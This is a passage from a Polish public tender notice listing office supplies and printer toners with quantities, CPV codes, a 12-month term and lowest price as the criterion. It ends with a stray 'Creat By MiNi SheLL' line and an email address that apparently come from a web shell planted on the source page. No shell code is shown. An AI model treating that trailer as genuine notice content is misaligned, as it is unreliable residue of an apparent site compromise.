17	Długopis PILOT super grip /F/lub równoważny	szt	120
18	Długopis S-FINE /25//lub równoważny	opk	5
19	Długopis SN 101/lub równoważny	szt	120
20	Długopis żel HANDY /12//lub równoważny	opk	20
21	Dyski CD-R /10/	opk	5
22	Dyskietki 3,5 /10/	opk	5
23	Dziennik korespondencyjny A4/200	szt	3
24	Dziennik korespondencyjny A4/96	szt	6
25	Dziurkacz biurowy do 25 kartek LACO/lub równoważny	szt	10
26	Dziurkacz biurowy metal do 100 kartek TY 845/lub równoważny	szt	1
27	Etykieta samoprzylepna 52,5*21,2 biała /100/	opk	1
28	Etykieta samoprzylepna A4 biała /100/	opk	5
29	FA VAT A4 brutto /S/	szt	20
30	FA VAT A5 /S/	szt	5
31	FA VAT A5 brutto /S/	szt	5
32	FA wewnętrzna A5 /S/	szt	5
33	Fastykuła A4 szara	szt	500
34	Flamastry 6 kol	opk	5
35	Gumka do mazania biała	szt	20
36	Gumka recepturka 1 kg /60/	opk	10
37	Kalendarz planer A2 na biurko z lis.	szt	10
38	Kalka maszynowa A4/25	opk	5
39	Kalka ołówkowa A4/25	opk	15
40	Kalkulator na biurko /12 cyfrowy/ 	szt	5
41	Karton wizytówkowy A4/20 płótno ecru	opk	10
42	Klej kulkowy 50 ml	szt	20
43	Klej sztyft BANTEX 36 g/lub równoważny	szt	24
44	Klej sztyft BANTEX 8 g/lub równoważny	szt	250
45	Klej typu super glu /12/	opk	12
46	Koperta AIR 16 biała	szt	10
47	Koperta AIR 17 biała	szt	30
48	Koperta B4 SK biała /50/	opk	100
49	Koperta B5 NK brązowa /500/	opk	5
50	Koperta B5 SK biała /25/	opk	20
51	Koperta C4 SK biała /25/	opk	50
52	Koperta C6 SK biała /1000/	 	5
53	Koperta C6 SK biała /50/	opk	100
54	Koperta SDS-200	szt	30
55	Koperta SDS-220	szt	30
56	Korektor myszka HANDY/lub równoważny	szt	36
57	Korektor w pisaku PENTEL płaski metal/lub równoważny	szt	60
58	Korektor w płynie 	szt	36
59	Kostka biała klejona	szt	120
60	Kostka biała NK	szt	60
61	Kostka kolor klejona	szt	60
62	Kostka kolor NK	szt	60
63	KP A6 /S/	szt	5
64	Kredki ołówkowe 12 kol	opk	5
65	Kredki świecowe 18 kol	opk	2
66	KW A6 /S/	szt	5
67	Kwitariusz przychodów A5 /S/	szt	100
68	Linijka 20 cm 	szt	10
69	Linijka 30 cm 	szt	10
70	Linijka 40 cm 	szt	10
71	Linijka 50 cm 	szt	10
72	Marker olejowy średni	szt	150
73	Marker pernament okrągła końcówka czarny	szt	150
74	Marker pernament okrągła końcówka kolor	szt	25
75	Marker pernament ścięta końcówka czarny	szt	150
76	Marker pernament ścięta końcówka kolor	szt	25
77	Modelina 10 kol	opk	10
78	Notes samoprzylepny żółty 38*51	opk	12
79	Notes samoprzylepny żółty 76*100	opk	12
80	Notes samoprzylepny żółty 76*76	opk	12
81	Nożyczki biurowe 15,5 cm	szt	12
82	Nożyczki biurowe 17,5 cm	szt	13
83	Obowluta A4 z klapką /10/	opk	20
84	Obwoluta B4 z klapką /10/	opk	50
85	Obwoluta groszkowa A4 /100/	opk	150
86	Okładka do bindowania przeźroczysta /100/	opk	2
87	Okładka do bindowania tektura kolor /100/	opk	2
88	Ołówek HB /12/	opk	15
89	Papier kancelaryjny A3 # /500/	opk	2
90	Papier komputerowy 240*12 1+0	opk	5
91	Papier komputerowy 240*12 1+1 kolor/nadruk	opk	5
92	Papier komputerowy 240*12 1+1 kolor/nadruk	opk	5
93	Papier komputerowy 360*12 1+2 kolor	opk	2
94	Papier ksero A3 Polspeed /500//lub równoważny	opk	10
95	Papier ksero A4 Pollux /500//lub równoważny	opk	50
96	Papier ksero A4 Polspeed /500//lub równoważny	opk	700
97	Pinezka do tablic korkowych /25/	opk	5
98	Pinezki tablicowe /50/	opk	5
99	Pisaki dwustronne 12 szt 	opk	2
100	Pisaki foliopisy	szt	150
101	Pojemniki do archiwum A4/10 VAUPE	szt	50
102	Pojemniki do archiwum A4/7 VAUPE	szt	50
103	Polecenie ksiegowania A5	szt	10
104	Półka na dokumenty	szt	12
105	Przekładki do segregatora 1/3 A4 kolor /100/	opk	10
106	Pudła zbiorcze do archiwum A4/10 VAUPE	szt	20
107	Pudła zbiorcze do archiwum A4/10 VAUPE	szt	20
108	Rachunek A6 /S/	szt	5
109	Raport kasowy A4	szt	10
110	Rolka do faksu 210*30	szt	12
111	Rolka do faksu 216*25	szt	24
112	Rolka do faksu 216*30	szt	24
113	Rolka offset 57*25 /10/	opk	15
114	Rolka offset 57*30 /10/	opk	5
115	Rolka termo 57*30 /10/	opk	10
116	Rozszywacz	szt	5
117	Segregator A4/5 szyna BANTEX kolor folia/lub równoważny	szt	100
118	Segregator A4/5 VAUPE okuty/lub równoważny	szt	100
119	Segregator A4/7 szyna BANTEX kolor folia/lub równoważny	szt	150
120	Segregator A4/7 VAUPE okuty/lub równoważny	szt	150
121	Segregatory archiwizacyjne A4/7	szt	50
122	Skoroszyt 1/2 A4 /50/ BIGO zawieszka	opk	10
123	Skoroszyt A4 /50/ BIGO	opk	20
124	Skoroszyt A4 /50/ BIGO zawieszka	opk	20
125	Skoroszyt A4 PCV /25/	opk	50
126	Skoroszyt A4 PCV wpinany /25/	opk	50
127	Skorowidz 1/2 A4 TO	szt	5
128	Skorowidz A4 96 TO	szt	10
129	Skorowidz A5 96 TO	szt	5
130	Spinacz archiwizacyjny /50/	opk	2
131	Spinacze 28 /10/	opk	150
132	Tasma klejąca 18/30 /8/	opk	20
133	Taśma dwustronna 38	szt	20
134	Taśma meto 26/16 /5/ kolor	opk	30
135	Teczka do podpisu 8k	szt	5
136	Teczka na gumkę biała /10/	opk	15
137	Teczka na gumkę kolor /10/	opk	10
138	Teczka skrzydłowa na rzep 	szt	25
139	Teczka wiązana biała /10/	opk	15
140	Temperówka	szt	10
141	Tusz do stempli kolor	szt	50
142	Wąsy do skoroszytów metalowe /25/	opk	2
143	Wkład do długopisu SN 101 /12//lub równoważny	opk	5
144	Wkład do długopisu żel. HANDY /12//lub równoważny	opk	5
145	Wkład do segregatora A4 biały /50/	opk	25
146	Wkład do segregatora A5 biały /50/	opk	60
147	Wład do długopisu Pilot super grip /12//lub równoważny	opk	5
148	WZ 1/3 A4 / 6 poz/ /S/	szt	5
149	Zakreślacz kolor	szt	60
150	Zeszyt A4/96	szt	40
151	Zeszyt A5/16 #	szt	500
152	Zeszyt A5/32 #	szt	400
153	Zeszyt A5/60 #	szt	20
154	Zeszyt A5/80 #	szt	20
155	Zeszyt A5/96	szt	30
156	Zeszyt papierów kolorowych A4	szt	10
157	Zeszyt papierów kolorowych A5	szt	10
158	Zszywacz biurowy do 25 kartek LACO/lub równoważny	szt	10
159	Zszywki 24/6 /10/	opk	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7, 30.19.76.44-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Toner HP LJ 5L/6L nr. kat C3906A	Szt.	6
Toner HP LJ 4/5 nr. 92298A (98A)	Szt.	2
Toner HP LJ 1010/1020 nr. kat. Q2612A (12A)	Szt.	20
Toner HP LJ 1100 nr. kat. C4092A	Szt.	8
Toner HP LJ 1320/1160 nr. Kat. Q5949A (49A)	Szt.	4
Katridż HP DJ6540	nr 339 (C8767EE) - czarny	Szt.	40
	nr 344 (C9363EE) - kolor	Szt.	30
Katridż HP DJ 3940/ PSC 1410/ D1360	nr 21 (C9351AE) - czarny	Szt.	40
	nr 22 (C9352AE) - kolor	Szt.	20
Katridż HP DJ 670C	nr 29 (51629GE) - czarny	Szt.	4
	nr 49 (51649NE) - kolor	Szt.	2
Katridż HP DJ3845/ OfficeJet 4255	nr 27 (C8727AE) - czarny	Szt.	4
	nr 28 (C8728AE) - kolor	Szt.	2
Katridż HP DJ5550	nr 56 (C6656AE) - czarny	Szt.	2
	nr 58 (C6658AE) - kolor	Szt.	2
Katridż HP DJ5440 oryginały	nr 336 (C9362EE) - czarny	Szt.	8
	nr 342 (C9361EE) - kolor	Szt.	4
HP LJ P1156	HP 78A ORYGINAŁY	Szt.	10
Katridż Lexmark X2330	No 1 nr 18C0781E	Szt.	20
Katridż Canon ip3000 oryginały	nr. BCI-5eBK - czarny	Szt.	14
	nr BCI-6C,M,Y (cyan,magenta,yellow)	Szt.	6
Toner Samsung ML-1520 nr. ML-1520D3	Szt.	2
Toner Samsung ML-1610 nr ML-1610D2 	Szt.	4
Toner Samsung ML-2010P nr ML-2010D3	Szt.	20
Toner Develop D16G nr 4518604/Typ 101B	Szt.	4
Taśma barwiąca OKI MICROLINE 321 nr 09002303	Szt.	6
Toner Xerox Phaser 3117 nr 106R01159	Szt.	8
Toner Xerox Phaser 3140	Szt.	20
Toner HP CP 1215	Czarny oryginał	Szt.	12
	Cyan oryginał	Szt.	6
	Magenta oryginał	Szt.	6
	Yellow oryginał	Szt.	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.45.12-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com